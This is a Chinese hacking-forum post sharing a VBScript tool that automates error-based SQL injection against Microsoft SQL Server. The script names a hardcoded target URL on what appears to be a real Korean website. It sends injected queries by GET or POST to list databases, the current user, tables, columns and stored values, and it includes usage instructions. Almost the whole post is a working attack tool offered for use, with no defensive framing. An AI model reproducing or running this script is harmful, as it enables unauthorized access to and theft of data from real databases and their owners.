设为首页收藏本站
查看: 122|回复: 0

[PHP] Sql2005注射辅助脚本[粗糙版]

[复制链接]

论坛元老

Rank: 6Rank: 6

积分
34274
主题
17031
UID
1347
M币
67
贡献
17176

  • 发表于 2018-7-14 21:30:00 | 显示全部楼层 |阅读模式
    'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。 作者:Tr4c3 '为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。 '欲返回韩文等字符可修改121或者136行,更多的设置要自己修改 '更多功能请大家自己加入 Const method = "Get" '提交方式请修改此处,有get和post可选 Const DisPlay = "D" 'S 保存到文件,D输出到屏幕 Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性,此处请手工更改 i = 1 '库的基数 k = 0 '表和字段的基数 MyArray = Split(strUrl_B, "?", -1, 1) strUrl = MyArray(0) '取url strArg = MyArray(1) '取参数 Set Args = Wscript.Arguments If Args.Count = 0 Then ShowU End If 'If Args.Count =1 And LCase(Args(0)) '************************************************************************ ' 爆库 '************************************************************************ If Args.Count =1 Then If LCase(Trim(Args(0)))="databases" Then ResuT("---------------===============================--------------") ResuT("All The DataBases:") Do strData = " and quotename(db_name("&i&"))=0--" sqlInj(strData) i = i + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit ElseIf LCase(Trim(Args(0)))= "info" then ResuT("---------------===============================--------------") ResuT("The Current Database is:") strData = " and quotename(db_name())=0--" sqlInj(strData) ResuT("---------------===============================--------------") ResuT("The database User is:") strData = " and quotename(user)=0--" sqlInj(strData) ResuT("---------------===============================--------------") ResuT("The System_user is:") strData = " and quotename(System_user)=0--" sqlInj(strData) ResuT("---------------===============================--------------") Wscript.Quit End If End If '************************************************************************ ' 爆表 '************************************************************************ If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then ResuT("---------------===============================--------------") ResuT("The Tables Of " & Args(0)) Do strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--" sqlInj(strData) k = k + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit End If '************************************************************************ ' 爆字段 '************************************************************************ If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then Database = Args(0) Table = Args(1) TarGet = DataBase & ".dbo." & Table TarGetCol = Database & ".DBO.SYSCOLUMNS" ResuT("---------------===============================--------------") ResuT("The Columns Of " & TarGet) Do strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--" sqlInj(strData) k = k + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit End If '************************************************************************ ' 爆字段值 '************************************************************************ If Args.Count=4 And LCase(Trim(Args(3)))="values" Then Database = Args(0) Table = Args(1) col = Args(2) Target = Database & ".dbo." & Table ResuT("---------------===============================--------------") ResuT("The Values Of " & Args(2) & " in "&Target) Do strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--" sqlInj(strData) k = k + 1 Loop Until StrD="" ResuT("---------------===============================--------------") Wscript.Quit End If Sub SqlInj(value) If UCase(method) = "GET" Then value = strArg & value Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", strUrl &"?" & value , False objXML.SetRequestHeader "Referer", strUrl 'objXML.SetRequestHeader "Accept-Language", "EUC-KR" objXML.send() strRevS = objXML.ResponseText '默认用这个 'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个 If InStr(strRevS,"'[")0 And InStr(strRevs,"]'")0 Then strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2) ResuT(" |_"&strD) Else strD = "" End If ElseIf UCase(method) = "POST" Then value = strArg & value Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "POST", strUrl, False objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXML.SetRequestHeader "Referer", strUrl objXML.send(UrlEncode(value)) strRevS = objXML.ResponseText '默认用这个 'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个 If InStr(strRevS,"'[")0 And InStr(strRevs,"]'")0 Then strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2) ResuT(" |_"&strD) Else strD = "" End If End If End Sub Function ResuT(strInfo) If UCase(DisPlay) = "S" Then Set fso = CreateObject("Scripting.FileSystemObject") Set fso1 = fso.OpenTextFile("result.txt",8,True) fso1.WriteLine(strInfo) fso1.Close Set fso = Nothing ElseIf UCase(DisPlay) = "D" Then Wscript.Echo(strInfo) End If End Function Function UrlEncode(str) str = Replace(str," ","+") UrlEncode = str End Function Function bytes2BSTR(vIn) strReturn = "" For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode <&H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com") .Echo("Usage:") .Echo(" cscript"&.ScriptName&" info--爆基本信息") .Echo(" cscript"&.ScriptName&" databases--爆所有库名") .Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名") .Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名") .Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    在我站开通SVIP可同时获得17个站点VIP资源 立即登录 立即注册
    快速回复 返回顶部 返回列表